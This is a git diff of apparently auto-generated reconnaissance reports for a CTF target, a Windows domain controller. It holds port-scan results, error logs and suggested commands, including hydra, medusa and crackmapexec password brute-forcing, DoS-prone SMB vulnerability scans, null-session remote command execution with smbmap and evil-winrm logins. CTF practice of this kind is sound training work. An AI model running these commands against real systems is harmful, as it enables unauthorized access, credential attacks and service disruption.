"/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml" 10.129.243.131 + +impacket-rpcdump -port 135 10.129.243.131 + +enum4linux -a -M -l -d 10.129.243.131 2>&1 + +nbtscan -rvh 10.129.243.131 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 139 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml" 10.129.243.131 + +smbclient -L //10.129.243.131 -N -I 10.129.243.131 2>&1 + +smbmap -H 10.129.243.131 -P 139 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 389 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/xml/tcp_389_ldap_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 445 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_nmap.xml" 10.129.243.131 + +smbmap -H 10.129.243.131 -P 445 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 464 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/xml/tcp_464_kerberos_nmap.xml" 10.129.243.131 + +impacket-rpcdump -port 593 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 3268 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml" 10.129.243.131 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 2>&1 + +smbmap -H 10.129.243.131 -P 139 -R 2>&1 + +smbmap -H 10.129.243.131 -P 445 -R 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 -R 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 -R 2>&1 + +smbmap -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1 + +smbmap -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1 + +dig -p 53 -x 10.129.243.131 @10.129.243.131 + +dig AXFR -p 53 @10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/xml/udp_53_dns_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -sV -p 123 --script="banner,(ntp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/udp_123_ntp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/xml/udp_123_ntp_nmap.xml" 10.129.243.131 + + +``` \ No newline at end of file diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Errors.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Errors.md new file mode 100644 index 00000000..8de4cabf --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Errors.md @@ -0,0 +1,56 @@ +``` +[*] Service scan DNS Reverse Lookup (tcp/53/domain/dns-reverse-lookup) ran a command which returned a non-zero exit code (9). +[-] Command: dig -p 53 -x 10.129.243.131 @10.129.243.131 +[-] Error Output: + + +[*] Service scan DNS Zone Transfer (tcp/53/domain/dns-zone-transfer) ran a command which returned a non-zero exit code (9). +[-] Command: dig AXFR -p 53 @10.129.243.131 +[-] Error Output: + + +[*] Service scan wkhtmltoimage (tcp/80/http/wkhtmltoimage) ran a command which returned a non-zero exit code (1). +[-] Command: wkhtmltoimage --format png http://10.129.243.131:80/ /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png +[-] Error Output: +QStandardPaths: XDG_RUNTIME_DIR not set, defaulting to '/tmp/runtime-root' +Loading page (1/2) +[> ] 0% +[==============================> ] 50% +[==============================> ] 50% +Warning: Failed to load https://ajax.googleapis.com/ajax/libs/jqueryui/1.11.2/themes/smoothness/jquery-ui.css (ignore) +Error: Failed to load https://fonts.googleapis.com/css?family=Open+Sans%7CMaven+Pro:500, with network status code 3 and http status code 0 - Host fonts.googleapis.com not found +Error: Failed to load https://cdnjs.cloudflare.com/ajax/libs/prefixfree/1.0.7/prefixfree.min.js, with network status code 3 and http status code 0 - Host cdnjs.cloudflare.com not found +libva info: VA-API version 1.17.0 +libva info: Trying to open /usr/lib/x86_64-linux-gnu/dri/iHD_drv_video.so +libva info: Found init function __vaDriverInit_1_17 +libva error: /usr/lib/x86_64-linux-gnu/dri/iHD_drv_video.so init failed +libva info: va_openDriver() returns 1 +libva info: Trying to open /usr/lib/x86_64-linux-gnu/dri/i965_drv_video.so +libva info: Found init function __vaDriverInit_1_8 +libva info: va_openDriver() returns 0 +[============================================================] 100% +Rendering (2/2) +[> ] 0% +[===============> ] 25% +[============================================================] 100% +Done +Exit with code 1 due to network error: HostNotFoundError + + +[*] Service scan SMBClient (tcp/139/netbios-ssn/smbclient) ran a command which returned a non-zero exit code (1). +[-] Command: smbclient -L //10.129.243.131 -N -I 10.129.243.131 2>&1 +[-] Error Output: + + +[*] Service scan DNS Reverse Lookup (tcp/53/domain/dns-reverse-lookup) ran a command which returned a non-zero exit code (9). +[-] Command: dig -p 53 -x 10.129.243.131 @10.129.243.131 +[-] Error Output: + + +[*] Service scan DNS Zone Transfer (tcp/53/domain/dns-zone-transfer) ran a command which returned a non-zero exit code (9). +[-] Command: dig AXFR -p 53 @10.129.243.131 +[-] Error Output: + + + +``` \ No newline at end of file diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Manual Commands.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Manual Commands.md new file mode 100644 index 00000000..78e95072 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Manual Commands.md @@ -0,0 +1,221 @@ +```bash +[*] domain on tcp/53 + + [-] Use dnsrecon to bruteforce subdomains of a DNS domain. + + dnsrecon -n 10.129.243.131 -d -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t brt 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_subdomain_bruteforce.txt + + [-] Use dnsrecon to automatically query data from the DNS server. You must specify the target domain name. + + dnsrecon -n 10.129.243.131 -d 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_default_manual.txt + +[*] http on tcp/80 + + [-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists: + + feroxbuster -u http://10.129.243.131:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt + + [-] Credential bruteforcing commands (don't run these without modifying them): + + hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.129.243.131/path/to/auth/area + + medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.129.243.131 -m DIR:/path/to/auth/area + + hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.129.243.131/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message" + + medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.129.243.131 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message" + + [-] (nikto) old but generally reliable web server enumeration tool: + + nikto -ask=no -h http://10.129.243.131:80 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nikto.txt" + + [-] (wpscan) WordPress Security Scanner (useful if WordPress is found): + + wpscan --url http://10.129.243.131:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_wpscan.txt" + +[*] msrpc on tcp/135 + + [-] RPC Client: + + rpcclient -p 135 -U "" 10.129.243.131 + +[*] netbios-ssn on tcp/139 + + [-] Bruteforce SMB + + crackmapexec smb 10.129.243.131 --port=139 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt" + + [-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). Be careful: + + nmap -vv --reason -Pn -T4 -sV -p 139 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_vulnerabilities.xml" 10.129.243.131 + +[*] ldap on tcp/389 + + [-] ldapsearch command (modify before running): + + ldapsearch -x -D "" -w "" -H ldap://10.129.243.131:389 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_all-entries.txt" + +[*] microsoft-ds on tcp/445 + + [-] Bruteforce SMB + + crackmapexec smb 10.129.243.131 --port=445 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt" + + [-] Lookup SIDs + + impacket-lookupsid '[username]:[password]@10.129.243.131' + + [-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). Be careful: + + nmap -vv --reason -Pn -T4 -sV -p 445 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_vulnerabilities.xml" 10.129.243.131 + +[*] ldap on tcp/3268 + + [-] ldapsearch command (modify before running): + + ldapsearch -x -D "" -w "" -H ldap://10.129.243.131:3268 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_all-entries.txt" + +[*] wsman on tcp/5985 + + [-] Bruteforce logins: + + crackmapexec winrm 10.129.243.131 -d '' -u '/usr/share/seclists/Usernames/top-usernames-shortlist.txt' -p '/usr/share/seclists/Passwords/darkweb2017-top100.txt' + + [-] Check login (requires credentials): + + crackmapexec winrm 10.129.243.131 -d '' -u '' -p '' + + [-] Evil WinRM (gem install evil-winrm): + + evil-winrm -u '' -p '' -i 10.129.243.131 + + evil-winrm -u '' -H '' -i 10.129.243.131 + +[*] msrpc on tcp/49667 + + [-] RPC Client: + + rpcclient -p 49667 -U "" 10.129.243.131 + +[*] msrpc on tcp/49673 + + [-] RPC Client: + + rpcclient -p 49673 -U "" 10.129.243.131 + +[*] msrpc on tcp/49695 + + [-] RPC Client: + + rpcclient -p 49695 -U "" 10.129.243.131 + +[*] msrpc on tcp/49843 + + [-] RPC Client: + + rpcclient -p 49843 -U "" 10.129.243.131 + +[*] domain on tcp/53 + + [-] Use dnsrecon to bruteforce subdomains of a DNS domain. + + dnsrecon -n 10.129.243.131 -d -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t brt 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_subdomain_bruteforce.txt + + [-] Use dnsrecon to automatically query data from the DNS server. You must specify the target domain name. + + dnsrecon -n 10.129.243.131 -d 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_default_manual.txt + +[*] http on tcp/80 + + [-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists: + + feroxbuster -u http://10.129.243.131:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt + + [-] Credential bruteforcing commands (don't run these without modifying them): + + hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.129.243.131/path/to/auth/area + + medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.129.243.131 -m DIR:/path/to/auth/area + + hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.129.243.131/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message" + + medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.129.243.131 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message" + + [-] (nikto) old but generally reliable web server enumeration tool: + + nikto -ask=no -h http://10.129.243.131:80 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nikto.txt" + + [-] (wpscan) WordPress Security Scanner (useful if WordPress is found): + + wpscan --url http://10.129.243.131:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_wpscan.txt" + +[*] msrpc on tcp/135 + + [-] RPC Client: + + rpcclient -p 135 -U "" 10.129.243.131 + +[*] netbios-ssn on tcp/139 + + [-] Bruteforce SMB + + crackmapexec smb 10.129.243.131 --port=139 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt" + + [-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). Be careful: + + nmap -vv --reason -Pn -T4 -sV -p 139 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_vulnerabilities.xml" 10.129.243.131 + +[*] ldap on tcp/389 + + [-] ldapsearch command (modify before running): + + ldapsearch -x -D "" -w "" -H ldap://10.129.243.131:389 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_all-entries.txt" + +[*] microsoft-ds on tcp/445 + + [-] Bruteforce SMB + + crackmapexec smb 10.129.243.131 --port=445 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt" + + [-] Lookup SIDs + + impacket-lookupsid '[username]:[password]@10.129.243.131' + + [-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). Be careful: + + nmap -vv --reason -Pn -T4 -sV -p 445 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_vulnerabilities.xml" 10.129.243.131 + +[*] ldap on tcp/3268 + + [-] ldapsearch command (modify before running): + + ldapsearch -x -D "" -w "" -H ldap://10.129.243.131:3268 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_all-entries.txt" + +[*] wsman on tcp/5985 + + [-] Bruteforce logins: + + crackmapexec winrm 10.129.243.131 -d '' -u '/usr/share/seclists/Usernames/top-usernames-shortlist.txt' -p '/usr/share/seclists/Passwords/darkweb2017-top100.txt' + + [-] Check login (requires credentials): + + crackmapexec winrm 10.129.243.131 -d '' -u '' -p '' + + [-] Evil WinRM (gem install evil-winrm): + + evil-winrm -u '' -p '' -i 10.129.243.131 + + evil-winrm -u '' -H '' -i 10.129.243.131 + +[*] domain on udp/53 + + [-] Use dnsrecon to bruteforce subdomains of a DNS domain. + + dnsrecon -n 10.129.243.131 -d -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t brt 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dnsrecon_subdomain_bruteforce.txt + + [-] Use dnsrecon to automatically query data from the DNS server. You must specify the target domain name. + + dnsrecon -n 10.129.243.131 -d 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dnsrecon_default_manual.txt + + +``` \ No newline at end of file diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Patterns.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Patterns.md new file mode 100644 index 00000000..f6e1683e --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Patterns.md @@ -0,0 +1,4 @@ +Identified Architecture: 64-bit + +Identified HTTP Server: Microsoft-IIS/10.0 + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Port Scans/PortScan - All TCP Ports.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Port Scans/PortScan - All TCP Ports.md new file mode 100644 index 00000000..10ab2e98 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Port Scans/PortScan - All TCP Ports.md @@ -0,0 +1,82 @@ +```bash +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 13:45:06 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml 10.129.243.131 +adjust_timeouts2: packet supposedly had rtt of 9072738 microseconds. Ignoring time. +adjust_timeouts2: packet supposedly had rtt of 9072738 microseconds. Ignoring time. +adjust_timeouts2: packet supposedly had rtt of 9146057 microseconds. Ignoring time. +adjust_timeouts2: packet supposedly had rtt of 9146057 microseconds. Ignoring time. +adjust_timeouts2: packet supposedly had rtt of 9198674 microseconds. Ignoring time. +adjust_timeouts2: packet supposedly had rtt of 9198674 microseconds. Ignoring time. +adjust_timeouts2: packet supposedly had rtt of 9287917 microseconds. Ignoring time. +adjust_timeouts2: packet supposedly had rtt of 9287917 microseconds. Ignoring time. +Nmap scan report for 10.129.243.131 +Host is up, received user-set (0.046s latency). +Scanned at 2023-10-28 13:45:20 CEST for 873s +Not shown: 65516 filtered tcp ports (no-response) +PORT STATE SERVICE REASON VERSION +53/tcp open domain syn-ack ttl 127 Simple DNS Plus +80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0 +|_http-server-header: Microsoft-IIS/10.0 +| http-methods: +|_ Supported Methods: GET HEAD OPTIONS +|_http-title: Slandovia Energy +88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-10-28 12:58:41Z) +135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC +139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn +389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name) +445/tcp open microsoft-ds? syn-ack ttl 127 +464/tcp open kpasswd5? syn-ack ttl 127 +593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 +636/tcp open tcpwrapped syn-ack ttl 127 +3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name) +3269/tcp open tcpwrapped syn-ack ttl 127 +5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) +|_http-server-header: Microsoft-HTTPAPI/2.0 +|_http-title: Not Found +9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing +49667/tcp open unknown syn-ack ttl 127 +49673/tcp open unknown syn-ack ttl 127 +49674/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 +49695/tcp open unknown syn-ack ttl 127 +49843/tcp open unknown syn-ack ttl 127 +Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port +Device type: WAP|phone +Running: Linux 2.4.X|2.6.X, Sony Ericsson embedded +OS CPE: cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:linux:linux_kernel:2.6.22 cpe:/h:sonyericsson:u8i_vivaz +OS details: Tomato 1.28 (Linux 2.4.20), Tomato firmware (Linux 2.6.22), Sony Ericsson U8i Vivaz mobile phone +TCP/IP fingerprint: +OS:SCAN(V=7.93%E=4%D=10/28%OT=53%CT=%CU=%PV=Y%G=N%TM=653CF7B9%P=x86_64-pc-l +OS:inux-gnu)ECN(R=N)T1(R=N)T2(R=N)T3(R=N)T4(R=N)U1(R=N)IE(R=N) + +Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows + +Host script results: +|_clock-skew: 59m59s +| p2p-conficker: +| Checking for Conficker.C or higher... +| Check 1 (port 25314/tcp): CLEAN (Timeout) +| Check 2 (port 10793/tcp): CLEAN (Timeout) +| Check 3 (port 25536/udp): CLEAN (Timeout) +| Check 4 (port 25523/udp): CLEAN (Timeout) +|_ 0/4 checks are positive: Host is CLEAN or ports are blocked +| smb2-security-mode: +| 311: +|_ Message signing enabled and required +| smb2-time: +| date: 2023-10-28T12:59:18 +|_ start_date: N/A + +TRACEROUTE (using port 80/tcp) +HOP RTT ADDRESS +1 ... 30 + +Read data files from: /usr/bin/../share/nmap +OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 13:59:53 2023 -- 1 IP address (1 host up) scanned in 887.79 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Port Scans/PortScan - Top 100 UDP Ports.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Port Scans/PortScan - Top 100 UDP Ports.md new file mode 100644 index 00000000..3de2cdcc --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Port Scans/PortScan - Top 100 UDP Ports.md @@ -0,0 +1,51 @@ +```bash +nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 13:45:06 2023 as: nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml 10.129.243.131 +Nmap scan report for 10.129.243.131 +Host is up, received user-set (0.093s latency). +Scanned at 2023-10-28 13:45:07 CEST for 1811s +Not shown: 98 open|filtered udp ports (no-response) +PORT STATE SERVICE REASON VERSION +53/udp open domain? udp-response ttl 127 +| fingerprint-strings: +| DNS-SD: +| _services +| _dns-sd +| _udp +|_ local +123/udp open ntp? script-set +| ntp-info: +|_ receive time stamp: 2023-10-28T12:52:08 +1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : +SF-Port53-UDP:V=7.93%I=7%D=10/28%Time=653CF493%P=x86_64-pc-linux-gnu%r(DNS +SF:-SD,2E,"\0\0\x80\x82\0\x01\0\0\0\0\0\0\t_services\x07_dns-sd\x04_udp\x0 +SF:5local\0\0\x0c\0\x01")%r(Citrix,1E,"\x1e\0\x81\x01\x02\xfd\xa8\xe3\0\0\ +SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"); +Too many fingerprints match this host to give specific OS details +TCP/IP fingerprint: +SCAN(V=7.93%E=4%D=10/28%OT=%CT=%CU=%PV=Y%DS=10%DC=T%G=N%TM=653CFB56%P=x86_64-pc-linux-gnu) +SEQ(II=I) +U1(R=N) +IE(R=Y%DFI=N%TG=80%CD=Z) + +Network Distance: 10 hops + +Host script results: +|_clock-skew: 1h00m07s + +TRACEROUTE (using port 53/udp) +HOP RTT ADDRESS +1 